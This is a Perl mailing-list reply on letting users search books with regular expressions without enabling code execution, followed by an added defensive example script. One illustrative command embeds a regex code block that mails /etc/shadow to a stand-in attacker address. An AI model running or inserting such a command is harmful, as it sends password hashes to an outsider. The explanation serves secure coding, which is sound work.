Re: regexp validation (arbitrary code execution) (regexp injection)
On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?

In general this shouldn't be a problem provided you don't turn on

use re "eval";

$ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print "hello" })/ at -e line 1.

$ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'
hello

Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:

$ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com < /etc/shadow" ])'

Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.

If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum
flexibility.

--
Paul Johnson - paul@xxxxxxxx
http://www.pjcj.net
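One way to put the advice above into practice, as an added example that is not part of the original thread or Paul's reply: the user's pattern is compiled with qr// inside a block eval (never a string eval), so a pattern carrying a (?{ }) code block is refused by perl at compile time and the error is caught rather than executed. The book list, the field names and the helper names are constructed for this example.

```perl
#!/usr/bin/env perl
# Added example (not from the original thread): compile a user-supplied
# pattern safely and show that code blocks are refused without `use re 'eval'`.
use strict;
use warnings;

# Constructed sample "books": title, author and a snippet of content.
my @books = (
    { title => 'Programming Perl', author => 'Larry Wall',      content => 'camel' },
    { title => 'Learning Perl',    author => 'Randal Schwartz', content => 'llama' },
);

# Compile the user's pattern with qr// inside a *block* eval.
# The pattern is interpolated as data, not as Perl source, so a syntax
# error (or a forbidden (?{ }) block) becomes a trappable exception instead
# of executed code.  Never write eval "m/$pattern/" here: a *string* eval
# turns the input into Perl source.  Also make sure no `use re 'eval'` is
# in lexical scope at this compilation site; that pragma is what lifts
# the runtime ban on eval-groups.
sub compile_user_regex {
    my ($pattern) = @_;
    my $re = eval { qr/$pattern/ };
    return (undef, $@) unless defined $re;
    return ($re, undef);
}

# Match the compiled pattern against one known field; the field name is
# whitelisted so it cannot be used to reach anything but the three columns.
sub search_books {
    my ($pattern, $field) = @_;
    die "unknown field: $field\n" unless $field =~ /^(?:title|author|content)$/;
    my ($re, $err) = compile_user_regex($pattern);
    die "rejected pattern: $err" if $err;
    return map { $_->{title} } grep { $_->{$field} =~ $re } @books;
}

# A legitimate search (hypothetical user input) ...
print join(', ', search_books('^Learn', 'title')), "\n";   # Learning Perl

# ... and one containing a code block.  Without `use re 'eval'` perl
# refuses to compile it at runtime ("Eval-group not allowed at runtime"),
# and the block eval hands the message back instead of running the code.
my ($re, $err) = compile_user_regex('(?{ print "hello" })');
print defined $re ? "compiled (unexpected)\n" : "refused: $err";
```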